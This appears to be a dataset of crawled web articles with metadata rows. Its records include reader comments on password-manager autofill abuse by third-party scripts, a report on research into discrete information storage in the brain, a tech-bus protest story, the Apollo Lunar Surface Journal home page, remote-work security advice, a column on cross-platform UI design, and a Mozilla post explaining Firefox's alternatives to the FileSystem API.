(I use Firefox with NoScript addon)
But you’re right, if I allow running JS from rawgit, then it can steal my e-mail-password couple.
It is a little bit scarie… 🙁
I use LastPass on Firefox but I also got 2 question marks – even with auto fill enabled.
Have I done something wrong?
Disclosure: I work for AgileBits, the makers of 1Password.
1Password is not vulnerable to this attack specifically because we have never allowed for “automatic autofill”. (Despite strong user request for such a behavior.) 1Password will automatically fill a form on the user’s command, but never without some user action.
We’ve required user action precisely because we consider the web page to be a very hostile environment. What David Silver refers to as “sweep attacks” have been known about both in theory and practice for quite some time. But even prior to learning of those, we felt that user action should be required.
Here is something I wrote in 2014 in response to some of the many customer requests for more automated behavior.
https://discussions.agilebits.com/discussion/comment/153916/#Comment_153916
That was what I thought when I read about this on BGR, but they specifically called out 1Password and LastPass browser plugins:
“To quickly fill in usernames and passwords saved in a password management app like 1Password and LastPass, you have probably installed browser addons. It’s those tiny browser apps that are targeted by scripts.“
Agile Bits also addressed this directly on their blog:
https://blog.agilebits.com/2017/12/30/1password-keeps-you-safe-by-keeping-you-in-the-loop/
If the 3rd party script is on a login page (which happens less according to the analysis, but still happens), a user might use the 1Password keyboard shortcut to fill in the legitimate form. Will 1Password fill in the credentials into the fake form too?
1 password does indeed autofill some sites I go to, including banking sites. I don’t understand Goldberg’s comment
You must have had some other password manager (most likely that built-in to the browser) save those passwords if they’re being filled with no interaction on your part. 1Password indeed does not fill anything until you ask it to. It has no option to autofill a password upon page load.
Here, firefox addon Privacy Badger (PB) immediately flagged rawgit.com as a tracker and blocked the sniffer script. Probably it was known before? Sadly, it is not really an option to recommend PB: users do enjoy the faster page-loads, but when a site breaks, and that can happen, they are clueless at first, and then annoyed by the fact, that PB cannot read their minds and so they have to manage something; even though the PB interface is quite easy to use, IMO.
Just to clarify, we use RawGit (rawgit.com) to serve code from GitHub with the right content type.
https://github.com/rgrove/rawgit/blob/master/FAQ.md
RawGit is not responsible for any of the code that they seem to serve. Privacy Badger must have flagged it perhaps because some other sites embed code from GitHub through rawgit.com.
Anything that adds usability overhead to password manager auto-fill feels like a challenging proposal. (And user opt-out is always a relatively ineffective control to mitigate systemic issues like this.)
But what about auto-applying the write-only property to a form as soon as it’s been auto-filled? In other words, once the browser has auto-filled a field, the field is considered to be in a locked-down state with no further DOM access. That could create some publisher pain for those who are using JS to access the email field in legit ways to instrument a better login form, but that would be putting the burden on a small class of websites, and not on users using auto-fill.
That sounds like an interesting idea to explore. One can imagine autofilled credentials are not needed to be checked for password strength or duplicate usernames – common cases of legit script access to login forms. Still, one needs telemetry or web measurement data to back this up.
The question is whether browsers will ever ship write-only elements or similar protections 🙂
| true | true | true |
In this second installment of the "No Boundaries" series, we show how a long-known vulnerability in browsers’ built-in password managers is abused by
|
2024-10-12 00:00:00
|
2017-12-27 00:00:00
|
article
|
freedom-to-tinker.com
|
Freedom to Tinker
| null | null |
|
21,326,934 |
https://www.technologyreview.com/s/611165/does-the-brain-store-information-in-discrete-or-analog-form/
|
Does the brain store information in discrete or analog form?
|
Emerging Technology
|
# Does the brain store information in discrete or analog form?
For engineers, the question of whether to store information in analog or discrete form is easy to answer. Discrete data storage has clear advantages, not least of which is that it is much more robust against degradation.
Engineers have exploited this property. Provided noise is below some threshold level, digital music can be copied endlessly. By contrast, music stored in analog form, such as on cassette or vinyl LP, can be copied only a few times before noise degrades the recording beyond recognition.
The process of evolution has also exploited this advantage. DNA stores information in discrete form as a sequence of nucleotides and this allows the blueprint for life to be transmitted from one generation to the next with high fidelity.
So it’s easy to imagine that the question of how the brain stores information is easy to answer. Not so. Neuroscientists have long pondered this issue, and many believe that it probably uses some form of analog data storage. But the evidence in favor of discrete or analog data storage has never been decisive.
Today that changes at least in part, thanks to the work of James Tee and Desmond Taylor at the University of Canterbury in New Zealand. These guys have measured the way people make certain types of decisions and say that their statistical analysis of the results strongly suggests that the brain must store information in discrete form. Their conclusion has significant implications for neuroscientists and other researchers building devices to connect to the brain.
First, some background. One reason that neuroscientists are undecided on this issue is because neural signals are obviously analog in character. They generate analog electrical pulses in which the voltage potential varies between -40mV and -70mV at the cell membrane. So at first glance it’s easy to imagine that the data they carry is analog too.
That isn’t necessarily true. Electromagnetic signals are always analog at some level since it takes time for any circuit to switch from one state to another. However, the information encoded in these signals can be treated as discrete by ignoring these transitions.
So information transmitted along neurons could also be discrete. Indeed, there are good theoretical reasons to think it must be.
Back in 1948, the mathematician and engineer Claude Shannon published *A Mathematical Theory of Communication*, in which he showed how information stored in discrete form could be copied with arbitrarily small error, provided noise was below some threshold level.
By contrast, there is no equivalent theory for analog information, and attempts to approximate it by increasing the quantization of an analog signal into ever smaller parts suggest that it is nowhere near as robust. Indeed, Tee and Taylor say their theoretical analysis suggests that the brain cannot work like this. “It is impossible to communicate reliably between neurons under repeated transmissions using continuous representation,” they say.
But the experimental evidence that the brain stores data discretely has been lacking. Until now. Tee and Taylor go on to say that if the brain stores information in discrete form, it should process it in a different way than analog information. And that should lead to a measurable difference in human behavior in certain decision-making processes.
In particular, Tee and Taylor focus on problems in which people have to make decisions based on their assessment of probabilities. If the brain is able to assess probabilities in a continuous way, this should lead to a range of human behavior that varies smoothly as the probabilities change.
However, if the human brain works on a discrete basis, it must treat some probabilities in the same way. For example, a person might judge probabilities as being low, medium, or high. In other words, the probabilities must be rounded into specific categories—probabilities of 0.23 and 0.27 might be treated as low, 0.45 and 0.55 as medium, and 0.85 and 0.95 as high, for example.
In that case the range of human behavior would follow a step-like structure that reflects the jump from low to medium to high risk.
So Tee and Taylor studied human decision-making as probabilities change. They did this by testing the way over 80 people judged and added probabilities associated with roulette wheels in more than 2,000 experimental trials.
The experiments employed a similar approach. For example, participants were shown a roulette wheel with a certain sector mapped out and asked to judge the probability of the ball landing in that sector. Then they were shown two wheels with different sectors mapped out. They had to judge the probability of the ball landing in both sectors. Finally, they were asked to judge whether the probability was higher in the case of the single roulette wheel or the double roulette wheel example.
The researchers then varied the size of sectors in the experiments to span a wide range of probabilities, in total carrying out 2,000 trials. Participants performed the tests in random order on a computer touch screen and were paid a token amount for their participation (although they also had the chance to win a bonus based on their performance).
The results make for interesting reading. Tee and Taylor say that far from matching the smooth distribution of behavior expected if the brain stores information in analog form, the results are more easily interpreted using a discrete model of information storage.
An important factor is the extent to which the brain quantizes the probabilities. For example, does it divide them into three or four or more categories? And how does this quantization change with the task at hand? In that respect, Tee and Taylor say that a 4-bit quantization best fits the data.
“Overall, the results corroborate each other, supporting our discrete hypothesis of information representation in the brain,” conclude Tee and Taylor.
That’s an interesting result that has important consequences for future research in this area. “Going forward, we firmly believe that the correct research question to explore is no longer that of continuous versus discrete, but rather how fine-grained the discreteness is (how many bits of precision),” say Tee and Taylor. “It is very plausible that different parts of the brain operate at different levels of discreteness based on different numbers of quantization levels.”
Indeed, engineers have found this in designing products for the real world. Images are usually encoded with a 24-bit quantization, whereas music is generally quantized using a 16-bit system. This reflects the maximum resolution of our visual and auditory senses.
The work has implications for other areas too. There is increasing interest in devices that link directly with the brain. Such machine-brain interfaces will obviously benefit from a better understanding of how the brain processes and stores information, a long-term goal for neuroscientists. So research like this will help pave the way toward that goal.
Ref: arxiv.org/abs/1805.01631: Is Information in the Brain Represented in Continuous or Discrete Form?
### Keep Reading
### Most Popular
### Happy birthday, baby! What the future holds for those born today
An intelligent digital agent could be a companion for life—and other predictions for the next 125 years.
### This researcher wants to replace your brain, little by little
The US government just hired a researcher who thinks we can beat aging with fresh cloned bodies and brain updates.
### How to break free of Spotify’s algorithm
By delivering what people seem to want, has Spotify killed the joy of music discovery?
### Stay connected
## Get the latest updates from
MIT Technology Review
Discover special offers, top stories, upcoming events, and more.
| true | true | true |
New evidence in favor of a discrete form of data storage could change the way we understand the brain and the devices we build to interface with it.
|
2024-10-12 00:00:00
|
2018-05-21 00:00:00
| null |
article
|
technologyreview.com
|
MIT Technology Review
| null | null |
23,563,372 |
https://www.hq.nasa.gov/alsj/a11/as11psr.pdf
|
Apollo Lunar Surface Journal
| null |
Founder and Editor Emeritus
Eric M. Jones
Edited by Ken Glover
The Apollo Lunar Surface Journal is a record of the lunar surface operations conducted by the six pairs of astronauts who landed on the Moon from 1969 through 1972. The Journal is intended as a resource for anyone wanting to know what happened during the missions and why. It includes a corrected transcript of all recorded conversations between the lunar surface crews and Houston. The Journal also contains extensive, interwoven commentary by the Editor and by ten of the twelve moonwalking astronauts.
This December 2017 release of the Journal contains all of the text for the six successful landing missions as well as many photos, maps, equipment drawings, background documents, voice tracks, and video clips which, we hope, will help make the lunar experience more accessible and understandable.
The Journal is, in Neil Armstrong's words, a "living document" and is constantly being modified and updated. Please don't hesitate to let us know about errors. We want to get it right, but sometimes that can take a while. We would like to thank everyone for their help and patience. You may email the editors concerning typos, factual errors, or with general comments at:
The corrected transcript, commentary, and other text incorporated in the Apollo Lunar Surface Journal is protected by copyright. Individuals may make copies for personal use; but unauthorized production of copies for sale is prohibited. Unauthorized commercial use of copyright-protected material from the Apollo Lunar Surface Journal is prohibited; and the commercial use of the name or likeness of any of the astronauts without his express permission is prohibited.
The United States Government retains a non-exclusive, royalty-free license to publish or reproduce the published form of the Apollo Lunar Surface Journal, or to allow others to do so, for U.S. Government purposes.
**Dedication: To Di and HP, the sources of my serenity;and to the memory of my uncle, Leslie M. Jones,
who explored the upper atmosphere with rocket-borne instruments
and excited my interest in space.**
Page design by:
Gordon Roxburgh, Brian Lawrence and Ken Glover.
NASA Host:
Steve Garber
**Copyright © 1995-2018 by Eric M. Jones.
All rights reserved.
Last revised 05 June 2018.**
| true | true | true | null |
2024-10-12 00:00:00
|
2018-06-05 00:00:00
| null | null | null | null | null | null |
7,521,233 |
http://www.businessinsider.com/protestors-blocked-a-tech-bus-this-morning-with-vomit-2014-4
|
Protestors Blocked A Tech Bus This Morning With Vomit
|
Karyne Levy
|
Yeah, you read that right.
At the MacArthur BART station in Oakland, Calif., this morning, protestors blocked several tech buses for more than 30 minutes. A couple of the protestors climbed aboard the Yahoo bus and vomited on the windshield.
We're used to seeing plenty of colorful signs, of course, and yesterday, people dressed like clowns blocked the Google bus in the Mission neighborhood in San Francisco.
But barf takes it to a whole new level.
As Re/code points out, the protestors' anger may not be out of left field. The San Francisco Board of Supervisors last night denied an appeal by anti-shuttle proponents, who want to stop the buses from using public bus stops for a fee.
Check out some of the photos and tweets from the latest round of protests below:
3 #techbus blockaded at MacArthur Bart, police on scene #googlebus pic.twitter.com/8MD4eKkFAi
— The Red Son (@revscript) April 2, 2014
Like a Lady Gaga concert? MT “@revscript: Protester on roof of yahoo bus vomits on windshield #techbus #googlebus pic.twitter.com/990Hx6jOHI”
— Karl Mondon (@karlmondon) April 2, 2014
Yahoo bus blockaded at MacArthur station #googlebus #techbus all of your base are belong to us! pic.twitter.com/YWcTv6pMRV
— The Red Son (@revscript) April 2, 2014
This was at Macarthur @SFBART today. No police in sight. #googlebus @SFist pic.twitter.com/suVyQgIR7d
— Anton Molodetskiy (@AntonM) April 2, 2014
| true | true | true |
Yeah, you read that right.
|
2024-10-12 00:00:00
|
2014-04-03 00:00:00
|
https://i.insider.com/533c8cd56bb3f77811b5b892?width=840&format=jpeg
|
article
|
businessinsider.com
|
Insider
| null | null |
7,185,949 |
http://www.google.com/there-is-a-typo-in-title
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
304,804 |
http://www.alleyinsider.com/2008/9/wall-street-s-collapse-delivers-an-overdue-wake-up-call-to-startups
|
Wall Street's Collapse Delivers An Overdue Wake Up Call To Startups
|
Hank Williams
|
Today Lehman is filing for Chapter 11 bankruptcy protection, and Merrill Lynch is being bought for chicken feed by Bank of America.
The Wall Street sky is falling. but what does that mean to tech companies, and particularly to startups?
The last five or six years have been all about community, "social media" and other related types of communications. That era has ended and the next phase of the Web will be about *real* productivity. That means products that make you more efficient, and more effective. It means software that saves you money or makes you money. And yes, we are really going to have to start paying for the good stuff.
One theme that has been emerging is being referred to as "web meets world". It's an idea that has been discussed by Brad Burnham from Union Square Ventures, and also the folks at the Web 2.0 Summit. The concept is that the web needs to actually help you do things in the real world, and not just meet other folks on the web. I think this is all true but it is really just a fancy abstraction for helping people do things that matter, and things that they will pay for. As an example, Union Square just invested in Meetup -- a terrific investment. Meetup makes real money charging people for helping connect them to other people. They are providing real value and so people pay real money.
I find this "web meets world" concept particularly interesting because of a controversial piece I wrote back in April called "Free Is Killing Us, Blame The VCs." The core of my thesis in that piece is not that free is inherently bad, but that too much free was distorting the value of the market because the free is only supported by VC money and not real value being delivered to users.
As a result, I opined, it was way too hard to start a small business and to grow it because you need to "get to scale" since everything is expected to be free and monetized by advertising, which requires lots of users. Perhaps the idea people found most objectionable was when I said the following:
In today’s “free” world, in most online business categories, it is inherently impossible to start a small self-sustaining business and to grow it. This is because in the digital world, advertising, the only real revenue stream, cannot support a small digital business. If businesses were based on the idea that people paid for services then small companies could succeed at a small scale and grow. But it is very hard to charge when your competition is free.
People really objected to the idea that "in most online business categories, it is inherently impossible to start a small self-sustaining business and to grow it." And of course there is room for debate here. But what is not debatable is that by and large, tech startups engaged in offering totally free services ( I am not talking about freemium here) are not making money, and they are not getting acquired. Its fine not to get acquired, but you can't do that very long if you're not making money. And now that "free" VC capital is drying up, sustaining such businesses will be really tough.
Interestingly, at the time, Brad, among many others, took me to task for having a dated view of the online world, and for not understanding how it really works.
But in my view, Brad's stated new thesis is exactly in line with my writing at the time. "web meets world" really might be better phrased "web meets money." There will be fewer and fewer companies getting funded by offering services that help online folks interact with other online folks, because cool as it is, people won't pay for it, and the bottom is going to fall out. Brad and Union Square's new investment thesis is the canary in the coalmine for that strategy.
Brad's rebuttal to my April piece talks a lot about new business models that are going to emerge that I am just missing. But five months later, I see no evidence of it, and "web meets world" to me, suggests that in their heart of hearts, they don't either.
In fact, I think companies like 37 Signals have had it right all along. They preach charging people for services, and staying small, and adding real productive value. Scale is irrelevant in this model because the software ads value to the individual without the network effect. In this model, scale is a benefit, not a requirement. I am not saying there will not be successful advertising based companies, but I am saying they will have to solve really serious issues like improving the value equation of online banner ads, in order to be successful.
As I see it, this is a fantastic shift in the marketplace, because it means if you have a company that adds real value, you are less likely to get thrown off course by a flood of capital creating unsustainable competition. I am very happy the venture markets are making this shift.
*SAI Contributor Hank Williams is a New York-based entrepreneur. He writes Why Does Everything Suck? Exploring the tech marketplace from 10,000 feet.*
| true | true | true | null |
2024-10-12 00:00:00
|
2008-09-15 00:00:00
|
article
|
businessinsider.com
|
Insider
| null | null |
|
23,831,028 |
https://insights.dice.com/2020/07/14/remote-work-security-nightmare-how-do-we-fix-it/
|
Remote Work Is a Security Nightmare. How Do We Fix It?
|
Dice Staff
|
When organizations made the decision earlier this year that work-from-home was the new norm during the COVID-19 pandemic, it appears that many considered security an afterthought.
It’s been well-documented that almost as soon as the World Health Organization (WHO) formally declared COVID-19 a pandemic in March, phishing emails and spam attacks increased as fraudsters and cybercriminals attempted to either spread malware or steal credentials.
At the same time, the pandemic forced many organizations to send workers home and have them perform their duties from there—even when many employees didn’t have experience working remotely, or adequate security in place to ensure that they weren’t targeted by attackers looking for easy ways to steal data or infiltrate a large corporate network.
How inadequate was the security response to the WFH shift? A recent survey conducted by IBM Security and polling firm Morning Consult of 2,000 U.S. adults who are now working from home sheds some light on what’s changed—and what CISOs and their security teams need to do to fix this issue.
**Survey Reveals Lack of Security**
The IBM and Morning Consult study found that 93 percent of those surveyed were confident of their organization’s ability to keep personal identifiable information (PII) secure while working remotely. At the same time, however, 52 percent report that they are using their personal laptops for work—often with no new tools to secure it—and 45 percent haven’t received any new security training.
Digging further into the study, another 61 percent of respondents report that their organizations have not given them new security tools to help protect those laptops and other devices, even though they are now connected to corporate networks that may contain sensitive data. The study also found that 66 percent of respondents have not been provided with new password management guidelines, while 35 percent said that they are still reusing passwords for business accounts.
Charles Henderson, the global managing partner and head of IBM X-Force Red, believes that responses to the survey show that the rush to move workers into home offices meant security considerations were put off.
“The biggest takeaway here is that employees and organizations are not prepared for our new work-from-home normal, and the data shows it's because their employers aren't giving them the resources they need,” Henderson told Dice. “Now, it should also be noted that the reason these resources aren't available is because many organizations were rushed to adopt work from home models.”
He added: “Organizations weren't prepared for this remote shift and are now just starting to rethink the security aspects of it. At the end of the day, keeping the lights on is more important to organizations than security. While security may be a component of keeping the lights on, in 2020, there have been business continuity risks that organizations have just never seen before.”
**Beyond Shadow IT**
The IBM and Morning Consult survey also calls to mind a term, once out of fashion, that is starting to creep back into conversations. It’s the notion of “Shadow IT,” where workers are using devices or services not approved by the IT department and that lack strong security protections.
One of the main reasons Shadow IT has returned at this moment is that, when many workers were sent home, laptops and other equipment remained in short supply. This means some employees improvised and used personal devices to get the job done, Henderson explained.
The big difference now is that almost everyone in the organization is using Shadow IT. “I think the biggest takeaway from this is that this is a new reality for organizations,” Henderson said. “Shadow IT implies compartmentalized rogue usage—and right now, it’s not rogue if everyone is doing it. When the majority of an organization goes rogue, they’re no longer rogue.”
The consequence of this is that, by mixing business and personal devices, as well as corporate and personal passwords, employees and their organizations are vulnerable to hacking, whether it’s through brute-force attack methods or credential stuffing. It’s one reason why now is the time to rethink the security controls and processes that are in place.
“If employees aren’t provided the tools to do their jobs, they will seek ways to do things on their own,” Henderson said. “When we see that 35 percent of those new to working from home are reusing passwords for business apps or accounts, it also highlights an opportunity for organizations to offer solutions like password managers to help employees avoid password reuse.”
**Rethinking Security Post-COVID-19**
To counter some of the security issues that have crept in since work-from-home started, Lisa Plaggemier, chief strategy officer at MediaPro, which provides cybersecurity and privacy education, believes that now is the time for security teams to start raising awareness of the potential cyberthreats that lurk in home offices.
Plaggemier suggests starting out by sending good security practice reminders in company newsletters, Slack channels or other ways employees communicate.
Another way to improve cyber hygiene is for the security team to start leveraging the IT help desk and build good security practices when employees reach out for technical help.
“Leverage your IT help desk staff to provide security advice. If they’re helping an employee with their home router, ask if the password is complex and unique—and hopefully not still the default password,” Plaggemier told Dice. “Calls to the help desk for password reset issues should be accompanied by advice on password complexity. Give your IT staff some pre-built messaging to help them communicate important points to employees.”
IBM’s Henderson advises to go beyond training, and encourages CISOs and their teams to conduct more threat modeling and adversary simulation to help better understand how attackers can exploit weaknesses, especially when targeting WFH environments. With that knowledge, organizations can build a better defense.
“I advise clients to use the results to answer these two questions: How do I better detect an attack, and how do I better protect myself from an attack? This helps to identify security gaps in this new normal,” Henderson said.
| true | true | true |
When organizations made the decision earlier this year that work-from-home was the new norm during the COVID-19 pandemic, it appears that many considered security an afterthought.
|
2024-10-12 00:00:00
|
2020-07-14 00:00:00
|
Article
|
dice.com
|
Dice
| null | null |
|
36,429,353 |
https://www.wsj.com/articles/sesame-allergy-sufferers-wanted-warning-labels-they-got-more-sesame-283c70ce
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
18,162,469 |
https://techxplore.com/news/2018-10-startup-d-reinvent-production-metal.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
5,278,390 |
http://www.theregister.co.uk/2013/02/25/cross_platform_abstraction/
|
You've made an app for Android, iOS, Windows - what about the user interface?
|
Tim Anderson
|
This article is more than **1 year old**
# You've made an app for Android, iOS, Windows - what about the user interface?
## Where to find a sane design for all platforms
Cross-platform development is a big deal, and will continue to be so until a day comes when everyone uses the same platform. Android? HTML? WebKit? iOS? Windows?
Maybe one day, but for now the world is multi-platform, and unless you can afford to ignore all platforms but one, or to develop independent projects for each platform, some kind of cross-platform approach makes sense, especially in mobile.
Sometimes I hear it said that there are essentially two approaches to cross-platform mobile apps. You can either use an embedded browser control and write a web app wrapped as a native app, as in Adobe PhoneGap/Cordova or the similar approach taken by Sencha, or you can use a cross-platform tool that creates native apps, such as Xamarin Studio, Appcelerator Titanium, or Embarcardero FireMonkey.
Within the second category though, there is diversity. In particular, they vary concerning the extent to which they abstract the user interface.
Here is the trade-off: If you design your cross-platform framework to include user interface widgets, like labels, buttons, grids and menus, then you can have your application work almost the same way on every platform. You can also have tools that build the user interface once for all the platforms. This is a big win in terms of coding effort. If the framework is well implemented, it will still adopt some of the characteristics native to each platform so that it looks more or less native.
Some tools do this by drawing their own controls. Embarcadero FireMonkey is in this category. Another approach is to use native controls where possible (in other words, to call the API that shows a button, rather than drawing the button with the graphics API), but to use custom drawing where necessary, even sometimes implementing a control from one platform on another. The downside is that because those controls are not in fact native, there will be some differences, perhaps obvious, perhaps subtle. Martin Fowler at ThoughtWorks refers to this as the uncanny valley and argues against emulated controls.
Further, if you are sharing the UI design across all platforms, it is hard to make your design feel equally right in all cases. It might be better to take the approach adopted by most games, using a design that is distinctive to your app and make a virtue of its consistency across platforms, even though it does not have the native look and feel on any platform.
Xamarin Studio on the other hand makes no attempt to provide a shared GUI framework.
Xamarin chief executive Nat Friedman told me: “We don’t try to provide a user interface abstraction layer that works across all the platforms. We think that’s a bad approach that leads to lowest common denominator user interfaces.
I have never understood this use of the term “lowest common demominator”. The LCD in maths is the lowest number into which a specific group of numbers divide exactly, so it is an elegant thing. In cross-platform what you should strive for is the highest common intersection: to make available all the features common to each platform.
Having said that, Friedman is right; but the downside is the effort involved in maintaining two or more user interface designs for your app.
This is an old debate. One of the reasons IBM created Eclipse was a disagreement with Sun Microsystems over the best way to design a cross-platform user interface framework. Sun’s Swing framework, derived from Netscape’s Internet Foundation Classes first released in 1996, takes the custom-drawn approach, which is why Swing apps always look like Swing apps (even if you apply the “Windows” look and feel). A team from IBM, some originally from Object Technology International which was a company acquired by IBM, believed it was better to wrap native controls with a Java abstraction layer, created SWT (Standard Widget Toolkit) to do that, and used it to build Eclipse.
Personally I am wary of toolkits which rely heavily on custom-drawn controls rather than native controls, though I see their value. On the other hand, Xamarin Studio is so far in the other direction that it removes some of the benefit of a cross-platform framework.
My prediction is that Xamarin will come up with its own GUI abstraction framework in future, along the lines of SWT. It is a compromise; but one which delivers a lot of value to developers who want to create cross-platform apps with the maximum amount of shared code. ®
This piece first appeared on Tim Anderson's *IT Writing* website, here.
46
| true | true | true |
Where to find a sane design for all platforms
|
2024-10-12 00:00:00
|
2013-02-25 00:00:00
| null |
article
|
theregister.com
|
The Register
| null | null |
23,552,859 |
https://www.theguardian.com/world/2020/jun/17/pandemics-destruction-nature-un-who-legislation-trade-green-recovery
|
Pandemics result from destruction of nature, say UN and WHO
|
Damian Carrington
|
Pandemics such as coronavirus are the result of humanity’s destruction of nature, according to leaders at the UN, WHO and WWF International, and the world has been ignoring this stark reality for decades.
The illegal and unsustainable wildlife trade as well as the devastation of forests and other wild places were still the driving forces behind the increasing number of diseases leaping from wildlife to humans, the leaders told the Guardian.
They are calling for a green and healthy recovery from the Covid-19 pandemic, in particular by reforming destructive farming and unsustainable diets.
A WWF report, also published on Wednesday, warns: “The risk of a new [wildlife-to-human] disease emerging in the future is higher than ever, with the potential to wreak havoc on health, economies and global security.”
WWF’s head in the UK said post-Brexit trade deals that fail to protect nature would leave Britain “complicit in increasing the risk of the next pandemic”.
High-level figures have issued a series of warnings since March, with the world’s leading biodiversity experts saying even more deadly disease outbreaks are likely in future unless the rampant destruction of the natural world is rapidly halted.
Earlier in June, the UN environment chief and a leading economist said Covid-19 was an “SOS signal for the human enterprise” and that current economic thinking did not recognise that human wealth depends on nature’s health.
“We have seen many diseases emerge over the years, such as Zika, Aids, Sars and Ebola and they all originated from animal populations under conditions of severe environmental pressures,” said Elizabeth Maruma Mrema, head of the UN convention on biological diversity, Maria Neira, the World Health Organization director for environment and health, and Marco Lambertini, head of WWF International, in the Guardian article.
With coronavirus, “these outbreaks are manifestations of our dangerously unbalanced relationship with nature”, they said. “They all illustrate that our own destructive behaviour towards nature is endangering our own health – a stark reality we’ve been collectively ignoring for decades.
“Worryingly, while Covid-19 has given us yet another reason to protect and preserve nature, we have seen the reverse take place. From the Greater Mekong, to the Amazon and Madagascar, alarming reports have emerged of increased poaching, illegal logging and forest fires, while many countries are engaging in hasty environmental rollbacks and cuts in funding for conservation. This all comes at a time when we need it most.
“We must embrace a just, healthy and green recovery and kickstart a wider transformation towards a model that values nature as the foundation for a healthy society. Not doing so, and instead attempting to save money by neglecting environmental protection, health systems, and social safety nets, has already proven to be a false economy. The bill will be paid many times over.”
The WWF report concludes the key drivers for diseases that move from wild animals to humans are the destruction of nature, the intensification of agriculture and livestock production, as well as the trading and consumption of high-risk wildlife.
The report urges all governments to introduce and enforce laws to eliminate the destruction of nature from supply chains of goods and on the public to make their diets more sustainable.
Beef, palm oil and soy are among the commodities frequently linked to deforestation and scientists have said avoiding meat and dairy products is the single biggest way for people to reduce their environmental impact on the planet.
Tanya Steele, the head of WWF UK, said the post-Brexit trade deals must protect nature: “We cannot be complicit in increasing the risk of the next pandemic. We need strong legislation and trade deals that stop us importing food that is the result of rampant deforestation or whose production ignores poor welfare and environmental standards in producer countries. The government has a golden opportunity to make transformative, world-leading change happen.”
The WWF report said 60-70% of the new diseases that have emerged in humans since 1990 came from wildlife. Over the same period, 178m hectares of forest have been cleared, equivalent to more than seven times the area of the UK.
| true | true | true |
Experts call for legislation and trade deals worldwide to encourage green recovery
|
2024-10-12 00:00:00
|
2020-06-17 00:00:00
|
article
|
theguardian.com
|
The Guardian
| null | null |
|
12,256,605 |
http://phys.org/news/2015-09-people-emit-personal-microbial-cloud.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
25,113,655 |
https://matthewrayfield.com/projects/ai-pokemon/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
4,204,826 |
http://hacks.mozilla.org/2012/07/why-no-filesystem-api-in-firefox/
|
Why no FileSystem API in Firefox? – Mozilla Hacks - the Web developer blog
|
Jonas Sicking
|
A question that I get asked a lot is why Firefox doesn’t support the FileSystem API. Usually, but not always, they are referring specifically to the FileSystem and FileWriter specifications which Google is implementing in Chrome, and which they have proposed for standardization in W3C.
The answer is somewhat complex, and depends greatly on what exact capabilities of the above two specifications the person is actually wanting to use. The specifications are quite big and feature full, so it’s no surprise that people are wanting to do very different things with it. This blog post is an attempt at giving **my** answer to this question and explain why we haven’t implemented the above two specifications. But note that this post represents my personal opinion, intended to spur more conversation on this topic.
As stated above, people asking for “FileSystem API support” in Firefox are actually often interested in solving many different problems. In my opinion most, but so far not all, of these problems have better solutions than the FileSystem API. So let me walk through them below.
## Storing resources locally
Probably the most common thing that people want to do is to simply store a set of resources so that they are available without having to use the network. This is useful if you need quick access to the resources, or if you want to be able to access them even if the user is offline. Games are a very common type of application where this is needed. For example an enemy space ship might have a few associated images, as well as a couple of associated sounds, used when the enemy is moving around the screen and shooting. Today, people generally solve this by storing the images and sound files in a file system, and then store the file names of those files along with things like speed and firepower of the enemy.
However it seems a bit non-optimal to me to have to store some data separated from the rest. Especially when there is a solution which can store both structured data as well as file data. IndexedDB treats file data just like any other type of data. You can write a `File`
or a `Blob`
into IndexedDB just like you can store strings, numbers and JavaScript objects. This is specified by the IndexedDB spec and so far implemented in both the Firefox and IE implementations of IndexedDB. Using this, you can store all information that you need in one place, and a single query to IndexedDB can return all the data you need. So for example, if you were building a web based email client, you could store an object like:
`{`
subject: "Hi there",
body: "Hi Sven,\nHow are you doing...",
attachments: [blob1, blob2, blob3]
}
Another advantage here is that there’s no need to make up file names for resources. Just store the `File`
or `Blob`
object. No name needed.
In Firefox’s IndexedDB implementation (and I believe IE’s too) the files are transparently stored outside of the actual database. This means that performance of storing a file in IndexedDB is just as good as storing the file in a filesystem. It does not bloat the database itself slowing down other operations, and reading from the file means that the implementation just reads from an OS file, so it’s just as fast as a filesystem.
Firefox IndexedDB implementation is even smart enough that if you store the same Blob multiple files in a IndexedDB database it just creates one copy of the file. Writing further references to the same Blob just adds to an internal reference counter. This is completely transparent to the web page, the only thing it will notice is faster writes and less resource use. However I’m not sure if IE does the same, so check there first before relying on it.
## Access pictures and music folders
The second most common thing that people ask for related to a file system APIs is to be able to access things like the user’s picture or music libraries. This is something that the FileSystem API submitted to W3C doesn’t actually provide, though many people seems to think it does. To satisfy that use-case we have the DeviceStorage API. This API allows full file system capabilities for “user files”. I.e. files that aren’t specific to a website, but rather resources that are managed and owned by the user and that the user might want to access through several apps. Such as photos and music. The DeviceStorage API is basically a simple file system API mostly optimized for these types of files.
We’re still in the process of specifying and implementing this API. It’s available to test with in recent nightly builds, but so far isn’t enabled by default. The main problem with exposing this functionality to the web is security. You wouldn’t want just any website to read or modify your images. We could put up a prompt like we do with the GeoLocation API, given that this API potentially can delete all your pictures from the last 10 years, we probably want something more. This is something we are actively working on. But it’s definitely the case here that security is the hard part here, not implementing the low-level file operations.
## Low-level file manipulation
A less common request is the ability to do low-level create, read, update and delete (CRUD) file operations. For example being able to write 10 bytes in the middle of a 10MB file. This is not something IndexedDB supports right now, it only allows adding and removing whole files. This is supported by the FileWriter specification draft. However I think this part of this API has some pretty fundamental problems. Specifically there are no locking capabilities, so there is no way to do multiple file operations and be sure that another tab didn’t modify or read the file in between those operations. There is also no way to do fsync which means that you can’t implement ACID type applications on top of FileWriter, such as a database.
We have instead created an API with the same goal, but which has capabilities for locking a file and doing multiple operations. This is done in a way to ensure that there is no risk that pages can forget to unlock a file, or that deadlocks can occur. The API also allows fsync operations which should enable doing things like databases on top of FileHandle. However most importantly, the API is done in such a way that you shouldn’t need to nest asynchronous callbacks as much as with FileWriter. In other words it should easier to use for authors. You can read more about FileHandle at
https://wiki.mozilla.org/WebAPI/FileHandleAPI
## The `filesystem`
URL scheme
There is one more capability that exist in the FileSystem API not covered above. The specification introduces a new `filesystem:`
URL scheme. When loading URLs from `filesystem:`
it returns the contents of files in stored using the FileSystem API. This is a very cool feature for a couple of reasons. First of all these URLs are predictable. Once you’ve stored a file in the file system, you always know which URL can be used to load from it. And the URL will continue to work as long as the file is stored in the file system, even if the web page is reloaded. Second, relative URLs work with the `filesystem:`
scheme. So you can create links from one resource stored in the filesystem to another resource stored in the filesystem.
